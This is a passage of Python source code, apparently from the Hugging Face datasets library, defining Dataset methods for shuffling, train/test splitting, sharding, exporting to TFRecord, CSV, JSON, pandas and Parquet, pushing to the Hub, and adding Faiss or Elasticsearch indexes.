len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.shuffle` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return self if seed is not None and generator is not None: raise ValueError("Both `seed` and `generator` were provided. Please specify just one of them.") if generator is not None and not isinstance(generator, np.random.Generator): raise ValueError("The provided generator must be an instance of numpy.random.Generator") if generator is None: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args indices_cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(indices_cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached shuffled indices for dataset at {indices_cache_file_name}") return self._new_dataset_with_indices( fingerprint=new_fingerprint, indices_cache_file_name=indices_cache_file_name ) permutation = generator.permutation(len(self)) return self.select( indices=permutation, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=new_fingerprint, ) @transmit_format @fingerprint_transform( inplace=False, randomized_function=True, fingerprint_names=["train_new_fingerprint", "test_new_fingerprint"], ignore_kwargs=["load_from_cache_file", "train_indices_cache_file_name", "test_indices_cache_file_name"], ) def train_test_split( self, test_size: Union[float, int, None] = None, train_size: Union[float, int, None] = None, shuffle: bool = True, seed: Optional[int] = None, generator: Optional[np.random.Generator] = None, keep_in_memory: bool = False, load_from_cache_file: bool = True, train_indices_cache_file_name: Optional[str] = None, test_indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, train_new_fingerprint: Optional[str] = None, test_new_fingerprint: Optional[str] = None, ) -> "DatasetDict": """Return a dictionary (:obj:`datasets.DatsetDict`) with two random train and test subsets (`train` and `test` ``Dataset`` splits). Splits are created from the dataset according to `test_size`, `train_size` and `shuffle`. This method is similar to scikit-learn `train_test_split` with the omission of the stratified options. Args: test_size (:obj:`numpy.random.Generator`, optional): Size of the test split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the test split. If int, represents the absolute number of test samples. If None, the value is set to the complement of the train size. If train_size is also None, it will be set to 0.25. train_size (:obj:`numpy.random.Generator`, optional): Size of the train split If float, should be between 0.0 and 1.0 and represent the proportion of the dataset to include in the train split. If int, represents the absolute number of train samples. If None, the value is automatically set to the complement of the test size. shuffle (:obj:`bool`, optional, default `True`): Whether or not to shuffle the data before splitting. seed (:obj:`int`, optional): A seed to initialize the default BitGenerator if ``generator=None``. If None, then fresh, unpredictable entropy will be pulled from the OS. If an int or array_like[ints] is passed, then it will be passed to SeedSequence to derive the initial BitGenerator state. generator (:obj:`numpy.random.Generator`, optional): Numpy random Generator to use to compute the permutation of the dataset rows. If ``generator=None`` (default), uses np.random.default_rng (the default BitGenerator (PCG64) of NumPy). keep_in_memory (:obj:`bool`, default `False`): Keep the splits indices in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the splits indices can be identified, use it instead of recomputing. train_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the train split indices instead of the automatically generated cache file name. test_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the test split indices instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. train_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the train set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments test_new_fingerprint (:obj:`str`, optional, defaults to `None`): the new fingerprint of the test set after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments """ from .dataset_dict import DatasetDict # import here because of circular dependency if len(self.list_indexes()) > 0: raise DatasetTransformationNotAllowedError( "Using `.train_test_split` on a dataset with attached indexes is not allowed. You can first run `.drop_index() to remove your index and then re-add it." ) # If the array is empty we do nothing if len(self) == 0: return DatasetDict({"train": self, "test": self}) if test_size is None and train_size is None: test_size = 0.25 # Safety checks similar to scikit-learn's ones. # (adapted from https://github.com/scikit-learn/scikit-learn/blob/fd237278e895b42abe8d8d09105cbb82dc2cbba7/sklearn/model_selection/_split.py#L1750) n_samples = len(self) if ( isinstance(test_size, int) and (test_size >= n_samples or test_size <= 0) or isinstance(test_size, float) and (test_size <= 0 or test_size >= 1) ): raise ValueError( f"test_size={test_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if ( isinstance(train_size, int) and (train_size >= n_samples or train_size <= 0) or isinstance(train_size, float) and (train_size <= 0 or train_size >= 1) ): raise ValueError( f"train_size={train_size} should be either positive and smaller " f"than the number of samples {n_samples} or a float in the (0, 1) range" ) if train_size is not None and not isinstance(train_size, (int, float)): raise ValueError(f"Invalid value for train_size: {train_size} of type {type(train_size)}") if test_size is not None and not isinstance(test_size, (int, float)): raise ValueError(f"Invalid value for test_size: {test_size} of type {type(test_size)}") if isinstance(train_size, float) and isinstance(test_size, float) and train_size + test_size > 1: raise ValueError( f"The sum of test_size and train_size = {train_size + test_size}, should be in the (0, 1)" " range. Reduce test_size and/or train_size." ) if isinstance(test_size, float): n_test = ceil(test_size * n_samples) elif isinstance(test_size, int): n_test = float(test_size) if isinstance(train_size, float): n_train = floor(train_size * n_samples) elif isinstance(train_size, int): n_train = float(train_size) if train_size is None: n_train = n_samples - n_test elif test_size is None: n_test = n_samples - n_train if n_train + n_test > n_samples: raise ValueError( f"The sum of train_size and test_size = {n_train + n_test}, " "should be smaller than the number of " f"samples {n_samples}. Reduce test_size and/or " "train_size." ) n_train, n_test = int(n_train), int(n_test) if n_train == 0: raise ValueError( f"With n_samples={n_samples}, test_size={test_size} and train_size={train_size}, the " "resulting train set will be empty. Adjust any of the " "aforementioned parameters." ) if generator is None and shuffle is True: if seed is None: seed = np.random.get_state()[1][0] _ = np.random.random() # do 1 step of rng generator = np.random.default_rng(seed) # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if train_indices_cache_file_name is None or test_indices_cache_file_name is None: # we create a unique hash from the function, current dataset file and the mapping args if train_indices_cache_file_name is None: train_indices_cache_file_name = self._get_cache_file_path(train_new_fingerprint) if test_indices_cache_file_name is None: test_indices_cache_file_name = self._get_cache_file_path(test_new_fingerprint) if ( os.path.exists(train_indices_cache_file_name) and os.path.exists(test_indices_cache_file_name) and load_from_cache_file ): logger.warning( f"Loading cached split indices for dataset at {train_indices_cache_file_name} and {test_indices_cache_file_name}" ) return DatasetDict( { "train": self._new_dataset_with_indices( fingerprint=train_new_fingerprint, indices_cache_file_name=train_indices_cache_file_name ), "test": self._new_dataset_with_indices( fingerprint=test_new_fingerprint, indices_cache_file_name=test_indices_cache_file_name ), } ) if not shuffle: train_indices = np.arange(n_train) test_indices = np.arange(n_train, n_train + n_test) else: # random partition permutation = generator.permutation(len(self)) test_indices = permutation[:n_test] train_indices = permutation[n_test : (n_test + n_train)] train_split = self.select( indices=train_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=train_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=train_new_fingerprint, ) test_split = self.select( indices=test_indices, keep_in_memory=keep_in_memory, indices_cache_file_name=test_indices_cache_file_name, writer_batch_size=writer_batch_size, new_fingerprint=test_new_fingerprint, ) return DatasetDict({"train": train_split, "test": test_split}) def shard( self, num_shards: int, index: int, contiguous: bool = False, keep_in_memory: bool = False, indices_cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, ) -> "Dataset": """Return the `index`-nth shard from dataset split into `num_shards` pieces. This shards deterministically. dset.shard(n, i) will contain all elements of dset whose index mod n = i. dset.shard(n, i, contiguous=True) will instead split dset into contiguous chunks, so it can be easily concatenated back together after processing. If n % i == l, then the first l shards will have length (n // i) + 1, and the remaining shards will have length (n // i). `datasets.concatenate([dset.shard(n, i, contiguous=True) for i in range(n)])` will return a dataset with the same order as the original. Be sure to shard before using any randomizing operator (such as shuffle). It is best if the shard operator is used early in the dataset pipeline. Args: num_shards (:obj:`int`): How many shards to split the dataset into. index (:obj:`int`): Which shard to select and return. contiguous: (:obj:`bool`, default `False`): Whether to select contiguous blocks of indices for shards. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True`): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. indices_cache_file_name (:obj:`str`, optional): Provide the name of a path for the cache file. It is used to store the indices of each shard instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. """ if not 0 <= index < num_shards: raise ValueError("index should be in [0, num_shards-1]") if contiguous: div = len(self) // num_shards mod = len(self) % num_shards start = div * index + min(index, mod) end = start + div + (1 if index < mod else 0) indices = np.arange(start, end) else: indices = np.arange(index, len(self), num_shards) return self.select( indices=indices, keep_in_memory=keep_in_memory, indices_cache_file_name=indices_cache_file_name, writer_batch_size=writer_batch_size, ) def export( self, filename: str, format: str = "tfrecord", ): """Writes the Arrow dataset to a TFRecord file. The dataset must already be in tensorflow format. The records will be written with keys from `dataset._format_columns`. Args: filename (:obj:`str`): The filename, including the `.tfrecord` extension, to write to. format (`str`, optional, default `"tfrecord"`): The type of output file. Currently this is a no-op, as TFRecords are the only option. This enables a more flexible function signature later. """ try: import tensorflow as tf # noqa: F401 except ImportError: logger.error("Tensorflow needs to be installed to be able to return Tensorflow tensors.") # From https://www.tensorflow.org/tutorials/load_data/tfrecord def _bytes_feature(values): """Returns a bytes_list from a list of string / byte.""" return tf.train.Feature(bytes_list=tf.train.BytesList(value=values)) def _float_feature(values): """Returns a float_list from a list of float / double.""" return tf.train.Feature(float_list=tf.train.FloatList(value=values)) def _int64_feature(values): """Returns an int64_list from a list of bool / enum / int / uint.""" return tf.train.Feature(int64_list=tf.train.Int64List(value=values)) def _feature(values: Union[float, int, str, np.ndarray]) -> "tf.train.Feature": """Typechecks `values` and returns the corresponding tf.train.Feature.""" if isinstance(values, np.ndarray): if values.dtype == np.dtype(float): return _float_feature(values) elif values.dtype == np.int64: return _int64_feature(values) elif values.dtype == np.dtype(str) or ( values.dtype == np.dtype(object) and len(values) > 0 and isinstance(values[0], str) ): return _bytes_feature([v.encode() for v in values]) else: raise ValueError( f"values={values} is an np.ndarray with items of dtype {values[0].dtype}, which cannot be serialized" ) if hasattr(values, "dtype"): if np.issubdtype(values.dtype, np.floating): return _float_feature([values.item()]) elif np.issubdtype(values.dtype, np.integer): return _int64_feature([values.item()]) elif np.issubdtype(values.dtype, np.str): return _bytes_feature([values.item().encode()]) else: raise ValueError(f"values={values} has dtype {values.dtype}, which cannot be serialized") else: raise ValueError(f"values={values} are not numpy objects, and so cannot be serialized") def serialize_example(ex): feature = {key: _feature(value) for key, value in ex.items()} example_proto = tf.train.Example(features=tf.train.Features(feature=feature)) return example_proto.SerializeToString() def tf_serialize_example(ex): tf_string = tf.py_function(serialize_example, (ex,), tf.string) return tf.reshape(tf_string, ()) def generator(): for ex in self: yield serialize_example(ex) if self._format_type != "numpy": raise ValueError("Dataset format must be numpy before exporting") if not filename.endswith(".tfrecord"): raise ValueError("filename {filename} must end with .tfrecord") tf_dataset = tf.data.Dataset.from_generator(generator, output_types=tf.string, output_shapes=()) writer = tf.data.experimental.TFRecordWriter(filename) logger.info(f"Writing TFRecord to {filename}") writer.write(tf_dataset) logger.info(f"Finished writing TFRecord to {filename}") self = None # delete the dataset reference used by tf_dataset def to_csv( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_csv_kwargs, ) -> int: """Exports the dataset to csv Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. to_csv_kwargs: Parameters to pass to pandas's :func:`pandas.DataFrame.to_csv` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetWriter return CsvDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_csv_kwargs).write() def to_dict(self, batch_size: Optional[int] = None, batched: bool = False) -> Union[dict, Iterator[dict]]: """Returns the dataset as a Python dict. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `dict` or `Iterator[dict]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pydict() else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pydict() for offset in range(0, len(self), batch_size) ) def to_json( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_json_kwargs, ) -> int: """Export the dataset to JSON Lines or JSON. Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (:obj:`int`, optional): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. lines (:obj:`bool`, default ``True``): Whether output JSON lines format. Only possible if ``orient="records"`. It will throw ValueError with ``orient`` different from ``"records"``, since the others are not list-like. orient (:obj:`str`, default ``"records"``): Format of the JSON: - ``"records"``: list like ``[{column -> value}, … , {column -> value}]`` - ``"split"``: dict like ``{"index" -> [index], "columns" -> [columns], "data" -> [values]}`` - ``"index"``: dict like ``{index -> {column -> value}}`` - ``"columns"``: dict like ``{column -> {index -> value}}`` - ``"values"``: just the values array - ``"table"``: dict like ``{"schema": {schema}, "data": {data}}`` **to_json_kwargs: Parameters to pass to pandas's `pandas.DataFrame.to_json <https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_json.html>`_. Returns: int: The number of characters or bytes written. """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetWriter return JsonDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_json_kwargs).write() def to_pandas( self, batch_size: Optional[int] = None, batched: bool = False ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Returns the dataset as a :class:`pandas.DataFrame`. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `pandas.DataFrame` or `Iterator[pandas.DataFrame]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) for offset in range(0, len(self), batch_size) ) def to_parquet( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, **parquet_writer_kwargs, ) -> int: """Exports the dataset to parquet Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. parquet_writer_kwargs: Parameters to pass to PyArrow's :class:`pyarrow.parquet.ParquetWriter` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetWriter return ParquetDatasetWriter(self, path_or_buf, batch_size=batch_size, **parquet_writer_kwargs).write() def _push_parquet_shards_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ) -> Tuple[str, str, int, int]: """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Returns: repo_id (:obj:`str`): ID of the repository in <user>/<dataset_name>` or `<org>/<dataset_name>` format split (:obj:`str`): name of the uploaded split uploaded_size (:obj:`int`): number of uploaded bytes dataset_nbytes (:obj:`int`): approximate size in bytes of the uploaded dataset afer uncompression Example: .. code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ api = HfApi(endpoint=config.HF_ENDPOINT) token = token if token is not None else HfFolder.get_token() if token is None: raise EnvironmentError( "You need to provide a `token` or be logged in to Hugging Face with " "`huggingface-cli login`." ) if split is None: split = self.split or "train" identifier = repo_id.split("/") if len(identifier) > 2: raise ValueError( f"The identifier should be in the format <repo_id> or <namespace>/<repo_id>. It is {identifier}, " "which doesn't conform to either format." ) if len(identifier) == 2: organization, dataset_name = identifier else: dataset_name = identifier[0] organization = api.whoami(token)["name"] repo_id = f"{organization}/{dataset_name}" try: api.create_repo( dataset_name, token, repo_type="dataset", organization=organization, private=private, ) except HTTPError as err: if err.response.status_code == 409: if private is not None: logger.warning("The repository already exists: the `private` keyword argument will be ignored.") else: raise if self._indices is not None: dataset_nbytes = self.data.nbytes * len(self._indices) / len(self.data) else: dataset_nbytes = self.data.nbytes num_shards = int(dataset_nbytes / shard_size) + 1 shards = (self.shard(num_shards=num_shards, index=i, contiguous=True) for i in range(num_shards)) files = api.list_repo_files(repo_id, repo_type="dataset", revision=branch, token=token) files = [file for file in files if file.startswith("data/")] def path_in_repo(_index): return f"data/{split}-{_index:05d}-of-{num_shards:05d}.parquet" # Only delete file shards that don't currently exist. Others will be overwritten if the content is different # or will be left intact is the content is identical. def should_delete_file(file_name): file_to_overwrite = file_name in [path_in_repo(i) for i in range(num_shards)] file_from_same_split = file_name.startswith(f"data/{split}-") return file_from_same_split and not file_to_overwrite file_shards_to_delete = [file for file in files if should_delete_file(file)] def delete_file(file): api.delete_file(file, repo_id=repo_id, token=token, repo_type="dataset", revision=branch) if len(file_shards_to_delete): for file in utils.tqdm( file_shards_to_delete, desc="Deleting unused files from dataset repository", total=len(file_shards_to_delete), disable=bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled(), ): delete_file(file) uploaded_size = 0 for index, shard in utils.tqdm( enumerate(shards), desc="Pushing dataset shards to the dataset hub", total=num_shards, disable=bool(logging.get_verbosity() == logging.NOTSET), ): buffer = BytesIO() shard.to_parquet(buffer) uploaded_size += buffer.tell() api.upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=path_in_repo(index), repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) return repo_id, split, uploaded_size, dataset_nbytes def push_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ): """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Example: .. code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ repo_id, split, uploaded_size, dataset_nbytes = self._push_parquet_shards_to_hub( repo_id=repo_id, split=split, private=private, token=token, branch=branch, shard_size=shard_size ) organization, dataset_name = repo_id.split("/") info_to_dump = self.info.copy() info_to_dump.download_checksums = None info_to_dump.download_size = uploaded_size info_to_dump.dataset_size = dataset_nbytes info_to_dump.size_in_bytes = uploaded_size + dataset_nbytes info_to_dump.splits = { split: SplitInfo(split, num_bytes=dataset_nbytes, num_examples=len(self), dataset_name=dataset_name) } buffer = BytesIO() buffer.write(f'{{"{organization}--{dataset_name}": '.encode()) info_to_dump._dump_info(buffer) buffer.write(b"}") HfApi(endpoint=config.HF_ENDPOINT).upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=config.DATASETDICT_INFOS_FILENAME, repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) @transmit_format @fingerprint_transform(inplace=False) def add_column(self, name: str, column: Union[list, np.array], new_fingerprint: str): """Add column to Dataset. .. versionadded:: 1.7 Args: name (str): Column name. column (list or np.array): Column data to be added. Returns: :class:`Dataset` """ column_table = InMemoryTable.from_pydict({name: column}) _check_column_names(self._data.column_names + column_table.column_names) # Concatenate tables horizontally table = concat_tables([self._data, column_table], axis=1) # Update features info = self.info.copy() info.features.update(Features.from_arrow_schema(column_table.schema)) table = update_metadata_with_features(table, info.features) return Dataset(table, info=info, split=self.split, indices_table=self._indices, fingerprint=new_fingerprint) def add_faiss_index( self, column: str, index_name: Optional[str] = None, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. By default the index is done over the vectors of the specified column. You can specify :obj:`device` if you want to run it on GPU (:obj:`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: column (:obj:`str`): The column of the vectors to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. By default it corresponds to `column`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. dtype (data-type): The dtype of the numpy arrays that are indexed. Default is ``np.float32``. Example: .. code-block:: python ds = datasets.load_dataset('crime_and_punish', split='train') ds_with_embeddings = ds.map(lambda example: {'embeddings': embed(example['line']})) ds_with_embeddings.add_faiss_index(column='embeddings') # query scores, retrieved_examples = ds_with_embeddings.get_nearest_examples('embeddings', embed('my new query'), k=10) # save index ds_with_embeddings.save_faiss_index('embeddings', 'my_index.faiss') ds = datasets.load_dataset('crime_and_punish', split='train') # load index ds.load_faiss_index('embeddings', 'my_index.faiss') # query scores, retrieved_examples = ds.get_nearest_examples('embeddings', embed('my new query'), k=10) """ with self.formatted_as(type="numpy", columns=[column], dtype=dtype): super().add_faiss_index( column=column, index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) return self def add_faiss_index_from_external_arrays( self, external_arrays: np.array, index_name: str, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. The index is created using the vectors of `external_arrays`. You can specify `device` if you want to run it on GPU (`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: external_arrays (:obj:`np.array`): If you want to use arrays from outside the lib for the index, you can set :obj:`external_arrays`. It will use :obj:`external_arrays` to create the Faiss index instead of the arrays in the given :obj:`column`. index_name (:obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. dtype (:obj:`numpy.dtype`): The dtype of the numpy arrays that are indexed. Default is np.float32. """ super().add_faiss_index_from_external_arrays( external_arrays=external_arrays.astype(dtype), index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) def add_elasticsearch_index( self, column: str, index_name: Optional[str] = None, host: Optional[str] = None, port: Optional[int] = None, es_client: Optional["elasticsearch.Elasticsearch"] = None, # noqa: F821 es_index_name: Optional[str] = None, es_index_config: Optional[dict] = None, ): """Add a text index using ElasticSearch for fast retrieval. This is done in-place. Args: column (:obj:`str`): The column of the documents to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index name that is used to call :meth:`Dataset.get_nearest_examples` or :meth:`Dataset.search`. By default it corresponds to :obj:`column`. host (Optional :obj:`str`, defaults to localhost): host of where ElasticSearch is running port (Optional :obj:`str`, defaults to 9200): port of where ElasticSearch is running es_client (Optional :obj:`elasticsearch.Elasticsearch`): The elasticsearch client used to create the index if host and port are None. es_index_name (Optional :obj:`str`): The elasticsearch index name used to create the index. es_index_config (Optional :obj:`dict`): The configuration of the elasticsearch index. Default config is:: { "settings": { "number_of_shards": 1, "analysis": {"analyzer": {"stop_standard": {"type": "standard", " stopwords": "_english_"}}}, }, "mappings": { "properties": { "text": { "type": "text", "analyzer": "standard", "similarity": "BM25" }, } }, } Example: .. code-block:: python es_client = elasticsearch.Elasticsearch() ds = datasets.load_dataset('crime_and_punish', split='train') ds.add_elasticsearch_index(column='line', es_client=es_client, es_index_name="my_es_index") scores, retrieved_examples = ds.get_nearest_examples('line', 'my new query', k=10) """ with self.formatted_as(type=None, columns=[column]): super().add_elasticsearch_index( column=column, index_name=index_name, host=host, port=port, es_client=es_client, es_index_name=es_index_name, es_index_config=es_index_config, ) return self @transmit_format @fingerprint_transform(inplace=False) def add_item(self, item: dict, new_fingerprint: str): """Add item to Dataset. .. versionadded:: 1.7 Args: item (dict): Item data to be added. Returns: :class:`Dataset` """ item_table = InMemoryTable.from_pydict({k: [v] for k, v in item.items()}) # We don't call _check_if_features_can_be_aligned here so this cast is "unsafe" dset_features, item_features = _align_features([self.features, Features.from_arrow_schema(item_table.schema)]) # Cast to align the schemas of the tables and concatenate the tables table = concat_tables( [ self._data.cast(pa.schema(dset_features.type)) if self.features != dset_features else self._data, item_table.cast(pa.schema(item_features.type)), ] ) if self._indices is None: indices_table = None else: item_indices_array = pa.array([len(self._data)], type=pa.uint64()) item_indices_table = InMemoryTable.from_arrays([item_indices_array], names=["indices"]) indices_table = concat_tables([self._indices, item_indices_table]) info = self.info.copy() info.features.update(item_features) table = update_metadata_with_features(table, info.features) return Dataset( table, info=info, split=self.split, indices_table=indices_table, fingerprint=new_fingerprint, ) def align_labels_with_mapping(self, label2id: Dict, label_column: str) -> "Dataset": """Align the dataset's label ID and label name mapping to match an input :obj:`label2id` mapping. This is useful when you want to ensure that a model's predicted labels are aligned with the dataset. The alignment in done using the lowercase label names. Args: label2id (:obj:`dict`): The label name to ID mapping to align the dataset with. label_column (:obj:`str`): The column name of labels to align on. Example: .. code-block:: python # dataset with mapping {'entailment': 0, 'neutral': 1, 'contradiction': 2} ds 